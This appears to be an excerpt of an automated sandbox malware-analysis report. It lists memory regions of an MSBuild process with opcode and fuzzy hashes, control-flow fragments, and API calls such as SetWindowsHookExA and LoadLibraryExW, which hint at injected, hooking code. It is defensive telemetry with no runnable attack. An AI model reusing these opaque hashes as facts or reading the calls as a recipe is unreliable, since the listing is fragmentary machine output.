                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 4653e6b5d55c23623c44ed09089402aa5c3cdc5edb489ef0a454fcc01ea627d1
                                                                  • Instruction ID: 40ff1f5fa8ad82223df46c747ce7bf5a4e7a96e0abda75b6f1bf6faab6a0b319
                                                                  • Opcode Fuzzy Hash: 4653e6b5d55c23623c44ed09089402aa5c3cdc5edb489ef0a454fcc01ea627d1
                                                                  • Instruction Fuzzy Hash: 2751B330B012069FDB55EF74D960B6EB7F6AB84610F108979D819DB388EB30DD42CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1789 6114ba8-6114bdc 1791 6114bde-6114be1 1789->1791 1792 6114be3-6114bfd 1791->1792 1793 6114c02-6114c05 1791->1793 1792->1793 1794 61152e4-61152e6 1793->1794 1795 6114c0b-6114d03 1793->1795 1797 61152e8 1794->1797 1798 61152ed-61152f0 1794->1798 1813 6114d86-6114d8d 1795->1813 1814 6114d09-6114d56 call 6115460 1795->1814 1797->1798 1798->1791 1799 61152f6-6115303 1798->1799 1815 6114e11-6114e1a 1813->1815 1816 6114d93-6114e03 1813->1816 1827 6114d5c-6114d78 1814->1827 1815->1799 1833 6114e05 1816->1833 1834 6114e0e 1816->1834 1831 6114d83 1827->1831 1832 6114d7a 1827->1832 1831->1813 1832->1831 1833->1834 1834->1815
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fiq$XPiq
                                                                  • API String ID: 0-1767242014
                                                                  • Opcode ID: f37c8280a7f11752faba301fd9ab870f42205347e3f5b87206fc272f42dbb163
                                                                  • Instruction ID: 42c4422b273e8aeb7dbb69d9967d9a3555b8a578a0039c70061e523a70d6fd43
                                                                  • Opcode Fuzzy Hash: f37c8280a7f11752faba301fd9ab870f42205347e3f5b87206fc272f42dbb163
                                                                  • Instruction Fuzzy Hash: AE516C71F002089FEB55DFA5C814BAEBAF7AFC8700F20856AE105AF395DA758C018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 060FF5EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 72d49832c7e660e2adb2e8fb1289d053275da23bd04621f3be885901066ff5b8
                                                                  • Instruction ID: 5b7e6a31d00c89279e272067277ddc507c34f21127eeb228360976d580b7e192
                                                                  • Opcode Fuzzy Hash: 72d49832c7e660e2adb2e8fb1289d053275da23bd04621f3be885901066ff5b8
                                                                  • Instruction Fuzzy Hash: 9E815870A10B459FDBA4DF29D44079ABBF1FF88304F00892ED58AD7A50DB74E945CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3067169390.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c60000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 310b0348631c2b1c8d95a1624f7c0bed4c07339fb992bc01540584fe8f57d8b4
                                                                  • Instruction ID: fa0e753a1f61d6dfdc49da9c280125e9cf47735dca513b1d7b97c58bf7d2b1a5
                                                                  • Opcode Fuzzy Hash: 310b0348631c2b1c8d95a1624f7c0bed4c07339fb992bc01540584fe8f57d8b4
                                                                  • Instruction Fuzzy Hash: C9413472D043998FCB14DFB9D8006AEBFF1AFC9310F15866BD844A7241DB789945CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060F30B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: fe03551214a563723e1041f49e80909e50b04e32bcf1af3d0ad6c8f5b46a7039
                                                                  • Instruction ID: e5b91108082c7b0eb725785cc5ccd5f928581217cd0399322db97c322cf720e3
                                                                  • Opcode Fuzzy Hash: fe03551214a563723e1041f49e80909e50b04e32bcf1af3d0ad6c8f5b46a7039
                                                                  • Instruction Fuzzy Hash: 54314032A083449FCB54DFA8D850AAEFFF1EF85310F14885ED0999B290CB34A945CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F6FCF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 54d5768439a3bed3d39299f112ca8e425d13e89cfefe3e83f9d905da3b20e918
                                                                  • Instruction ID: 8e9b83bac1e1a100c6a56a3040c1d1a6053e1c60422ae87ce890f35b9c34c15e
                                                                  • Opcode Fuzzy Hash: 54d5768439a3bed3d39299f112ca8e425d13e89cfefe3e83f9d905da3b20e918
                                                                  • Instruction Fuzzy Hash: D121F4B5C003499FDB10CFAAD884ADEBFF4EB48320F14841AE954A3251D375AA44CF61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F6FCF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 5cdbe6c575ba89b2dc9e4931fcfdebb5e3356a5e522ba90e667b50c7dc56a5f4
                                                                  • Instruction ID: 07af33ff750e6d24710750c83badba3e239c9cd6e3d96a475cf2ca80f84b82a5
                                                                  • Opcode Fuzzy Hash: 5cdbe6c575ba89b2dc9e4931fcfdebb5e3356a5e522ba90e667b50c7dc56a5f4
                                                                  • Instruction Fuzzy Hash: 2121E4B5D102099FDB10CF9AD884ADEFFF4EB48320F14801AE918A3350D375A944CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060F30B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: ca194cc447ecdf4f6dd804db0e11ebb54e34c75b0ee1410ffe48468b57c0b46f
                                                                  • Instruction ID: e4d9f72673594c8d7355b2915076f7fe07f7b0e00570463db61dc8dd8d43bc26
                                                                  • Opcode Fuzzy Hash: ca194cc447ecdf4f6dd804db0e11ebb54e34c75b0ee1410ffe48468b57c0b46f
                                                                  • Instruction Fuzzy Hash: 652137B19002499FCB54CFAAC844BEEFFF5AF88320F14841AD498A3251CB746944CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060F30B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 6f31f7e1719eb60c06a3935ee2325008f7e7f0b1b8d68c65bf12f2ceda65863d
                                                                  • Instruction ID: 2d485ee0a1819952ca22f80709a65ed61314547bb399a4924299d58595231170
                                                                  • Opcode Fuzzy Hash: 6f31f7e1719eb60c06a3935ee2325008f7e7f0b1b8d68c65bf12f2ceda65863d
                                                                  • Instruction Fuzzy Hash: AE21F4B5D002099FCB54DF9AD844BEEFBF5EB88320F14842AD419A7290CB75A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF669,00000800,00000000,00000000), ref: 060FF85A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: ff0b605e33d9a7e052e49416cfe85440ccf3cb30202c8c4e00d5b12f30ccaf77
                                                                  • Instruction ID: 9933e83558882d0c0bea930f253b32aa026be26df777002fcfa60a4d47e36c09
                                                                  • Opcode Fuzzy Hash: ff0b605e33d9a7e052e49416cfe85440ccf3cb30202c8c4e00d5b12f30ccaf77
                                                                  • Instruction Fuzzy Hash: 0F1114B6C002499FCB10DFAAC844ADEFBF4EB89320F14842ED919A7610C375A545CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF669,00000800,00000000,00000000), ref: 060FF85A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 3e184e7a42695099020ac946e3b489bf487a2ff79e4e05800af99bbacc019b41
                                                                  • Instruction ID: 2638555669cf2cc45299cd1bc7043696a35cc222ba69987d51ceba5a29d50ec9
                                                                  • Opcode Fuzzy Hash: 3e184e7a42695099020ac946e3b489bf487a2ff79e4e05800af99bbacc019b41
                                                                  • Instruction Fuzzy Hash: C11103B6C003098FDB10DF9AC444A9EFBF4EB48320F14842AD919A7640C7B5A545CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00C6EC77
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3067169390.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c60000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 2ce8a7b57016623a0fcd50a2b1d9f892024b28caa2671015817c289c22cca7a1
                                                                  • Instruction ID: 308d8bc407f30a16d3c39d565334a793b61c92cf8ce7bc229a3d40c509e2adda
                                                                  • Opcode Fuzzy Hash: 2ce8a7b57016623a0fcd50a2b1d9f892024b28caa2671015817c289c22cca7a1
                                                                  • Instruction Fuzzy Hash: 6611F0B1C0065A9BCB10DF9AC544BDEFBF4EF48324F15816AD818B7241D778AA44CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 060FF5EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075600086.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 1485c2f3397c82fd84dff476ccfb7dfdc3ed9f9a09559affb768ae6542b95983
                                                                  • Instruction ID: 54be77d323682b42257afd81001cc9ecf32afb85be9e26511df9fdb4540d7aac
                                                                  • Opcode Fuzzy Hash: 1485c2f3397c82fd84dff476ccfb7dfdc3ed9f9a09559affb768ae6542b95983
                                                                  • Instruction Fuzzy Hash: A41110B5C003498FCB10CF9AC844ADEFBF4EB88324F20842AD919A7610D779A549CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHdq
                                                                  • API String ID: 0-2991842255
                                                                  • Opcode ID: d4bd2fe214997b455d00510004ec62e63a4f894939a4919b4e5d5ab6044b6b1a
                                                                  • Instruction ID: 15c3b22f18462064cf801d36ab04fb20331ff7e9e5b6547a4a8bcf83f3a56269
                                                                  • Opcode Fuzzy Hash: d4bd2fe214997b455d00510004ec62e63a4f894939a4919b4e5d5ab6044b6b1a
                                                                  • Instruction Fuzzy Hash: 4241B370E007499FDF55DF64D89479EBBB2BF86300F104939E406EB240DBB09946CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHdq
                                                                  • API String ID: 0-2991842255
                                                                  • Opcode ID: 29b97e0f1235819b1d7956e4e5e418b15c5e22ec858c5cf517c423d95952ba33
                                                                  • Instruction ID: 4b17d7976c8c7664ec8e31f67e5e428f5887b74ebde95e4cf8cd791a3aa654e5
                                                                  • Opcode Fuzzy Hash: 29b97e0f1235819b1d7956e4e5e418b15c5e22ec858c5cf517c423d95952ba33
                                                                  • Instruction Fuzzy Hash: 7631FE30B102058FDB59AB74D85476E3BE3AB89210F248939D406DF395EF34CE82C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq
                                                                  • API String ID: 0-847773763
                                                                  • Opcode ID: f30d82f54afccc1832994a3b04ff35ee2bc567d8eaffd293001a8e1824ef2b60
                                                                  • Instruction ID: 290c330f81f5092de8bd63a6c21209769715d020115de848964badce284ba7b2
                                                                  • Opcode Fuzzy Hash: f30d82f54afccc1832994a3b04ff35ee2bc567d8eaffd293001a8e1824ef2b60
                                                                  • Instruction Fuzzy Hash: 79F02235B24210CFDFE8EA48EA8026C77A1EB80310F2C8975E905CF295D731DA03C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74347c0e10cdd1b83529376e33b670cbed17ef163b3c110782521fed85ab1a7d
                                                                  • Instruction ID: d1500bc4ca375a2e7ad5e0a7a381fcbf1c904315d1231c4f853f2645a68e332f
                                                                  • Opcode Fuzzy Hash: 74347c0e10cdd1b83529376e33b670cbed17ef163b3c110782521fed85ab1a7d
                                                                  • Instruction Fuzzy Hash: 82D19134B002199FCB55DB68E990AAEB7F2FB88311F108579E905EB355DB39EC41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4749cabf0b06de1826a778b628630adca165a72d7d7252cd5ad890a432b5e1ea
                                                                  • Instruction ID: 81fcdca5681a464889e706b6b5c7b39b4fb703ec06f87ab466efcb733da307fe
                                                                  • Opcode Fuzzy Hash: 4749cabf0b06de1826a778b628630adca165a72d7d7252cd5ad890a432b5e1ea
                                                                  • Instruction Fuzzy Hash: F1619071F001214FDF549B7AC840A6FBADBAFD5220B254439E80EDB364DE66ED4287D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0cf7593a61f006a993acac96a7b9fcdbf1d16a4a5a1240e3fc530d842c59d95
                                                                  • Instruction ID: e380bd91e9cd028e89abddbd3c680926761f99530c2054b294ed46c87701756d
                                                                  • Opcode Fuzzy Hash: c0cf7593a61f006a993acac96a7b9fcdbf1d16a4a5a1240e3fc530d842c59d95
                                                                  • Instruction Fuzzy Hash: B6812D30B102099FDB58DFA8D55469EBBF6AF89710F208539E40ADF399DB34DC428B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d130719fa428570af9d94da3db6dcd24b5011c407712cfadd5a4f9eacfad5532
                                                                  • Instruction ID: 3eead3f3ccaf457ebb59cbc1be50580af6e7a8ba571e05e402fb85bf4eac7fd0
                                                                  • Opcode Fuzzy Hash: d130719fa428570af9d94da3db6dcd24b5011c407712cfadd5a4f9eacfad5532
                                                                  • Instruction Fuzzy Hash: 91913F34E002198BDF60DF64C850B9DB7B1FF89710F2085A9D549BB395DB70AA85CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21ddb47a98b90cd2fa32669be1c527b596738db0128c10381fb47991d50682ea
                                                                  • Instruction ID: 32f74d4a0559b30282d6da43778fc2eb40a944b539499fa1a15ca2376a498c40
                                                                  • Opcode Fuzzy Hash: 21ddb47a98b90cd2fa32669be1c527b596738db0128c10381fb47991d50682ea
                                                                  • Instruction Fuzzy Hash: 9C913E74E102198BDF60DFA8C840B9DB7B1FF89710F2085A9D549BB395DB70AA85CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 798f07b42be4073f1474e5d40ed211f48ed5d268200a0c8f51c0358bbe0ba5d4
                                                                  • Instruction ID: c81ec164c6e253317db3ebc3a9d24bc020925cc33fea7ff8a4c55b5afa400be2
                                                                  • Opcode Fuzzy Hash: 798f07b42be4073f1474e5d40ed211f48ed5d268200a0c8f51c0358bbe0ba5d4
                                                                  • Instruction Fuzzy Hash: E9712A70A002199FCB54DFA9D990A9EBBF6FF84310F248579E409AB355DB30E946CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b5918f5f82cb8ec09cf7b59c5cb6ab98e9b748ea740d1fb5c2d15b659887423
                                                                  • Instruction ID: 85a665e6bc51d15e9398023bbb0810718c9140d0a0578f81a01bc65b1dc74e2b
                                                                  • Opcode Fuzzy Hash: 8b5918f5f82cb8ec09cf7b59c5cb6ab98e9b748ea740d1fb5c2d15b659887423
                                                                  • Instruction Fuzzy Hash: D2710870A002199FCB54DFA9D990A9EBBF6FF88300F248579E409EB355DB30E946CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0257587bc89fd7a7020b0415605800e3897a58731d2250ab47693ef8dd945b9b
                                                                  • Instruction ID: 62c476c055f09face37aefbc3d215616ba8aef513bb22da2a4de238be73a0dc4
                                                                  • Opcode Fuzzy Hash: 0257587bc89fd7a7020b0415605800e3897a58731d2250ab47693ef8dd945b9b
                                                                  • Instruction Fuzzy Hash: 1051D231E01109DFCF54EB79E4846ADBBF2FB85315F21887AE106DB251DB358946CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2fda82237678e212a6900ad951d955d95ae26ee16efe29822e958fde8c3c05f1
                                                                  • Instruction ID: 0fb662fcae7c517753de836f441537dbefc2c28f7e7b7d5da32dd03d28179ce1
                                                                  • Opcode Fuzzy Hash: 2fda82237678e212a6900ad951d955d95ae26ee16efe29822e958fde8c3c05f1
                                                                  • Instruction Fuzzy Hash: B6517370B202149FEF64666CD854B6E26DAD789351F20443AE50EDB3E5CF7DCC426392
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c7359b0c392f185640fafc8857d632e3ce126a6700147cf5d9de86984f4c7b2
                                                                  • Instruction ID: 230c926800e7f6dead7392d086f5778d212edb260a52d4a90f6b077b97b4d5e2
                                                                  • Opcode Fuzzy Hash: 9c7359b0c392f185640fafc8857d632e3ce126a6700147cf5d9de86984f4c7b2
                                                                  • Instruction Fuzzy Hash: 505161B0B202149FEF64666CD854B6E26DAD789351F20443AE50EDB3E4CF79CC426392
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b510c743a32de7c8acf15b0ada3384086011efefe2b298839a7cfcf34b3fa6b
                                                                  • Instruction ID: af54f8eb7cb17dca79615442d36956f51f433f28d6de22e15557f512248f8e7f
                                                                  • Opcode Fuzzy Hash: 7b510c743a32de7c8acf15b0ada3384086011efefe2b298839a7cfcf34b3fa6b
                                                                  • Instruction Fuzzy Hash: 964170B1E006098FDF70CEA9D880AAFFBB3EB84310F10493AE156DB650D334E9558B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87a2a986064ee576509c471efe5ca32a8e6259af72a21006023af4e2abfdbaec
                                                                  • Instruction ID: bf41a987d359f54daf19066446fdaca23308edde6e430a25f2a47370a4a47ac7
                                                                  • Opcode Fuzzy Hash: 87a2a986064ee576509c471efe5ca32a8e6259af72a21006023af4e2abfdbaec
                                                                  • Instruction Fuzzy Hash: 4431E430E1071A8FCF24CF68E48069EBBF1FF85300F148939E845AB255EB70A946C780
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f56e05bc96205999f5139f63959af6e7d0b941501ffb4ace20884f22819a7e3
                                                                  • Instruction ID: e5c2c701e5641390cee77c6e4910f3bec9898a9c0d507d087cb952a320fd6667
                                                                  • Opcode Fuzzy Hash: 1f56e05bc96205999f5139f63959af6e7d0b941501ffb4ace20884f22819a7e3
                                                                  • Instruction Fuzzy Hash: C731B234E006099FCB19CF64D85469EB7F2EF89310F20C529E906EB355DB71AD82CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 789f38abb4983424a876727100a411de4a46804c960f33079a2ca9d2d6c04fa7
                                                                  • Instruction ID: 6cd75d04c69da1e6e7f8498ee5a8094f3b6456bbcb8468398bb0ec24d4a94d11
                                                                  • Opcode Fuzzy Hash: 789f38abb4983424a876727100a411de4a46804c960f33079a2ca9d2d6c04fa7
                                                                  • Instruction Fuzzy Hash: 16318030E106199FCB58DF64D95469EB7F2EF89310F20C529E906EB354DB71AD82CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

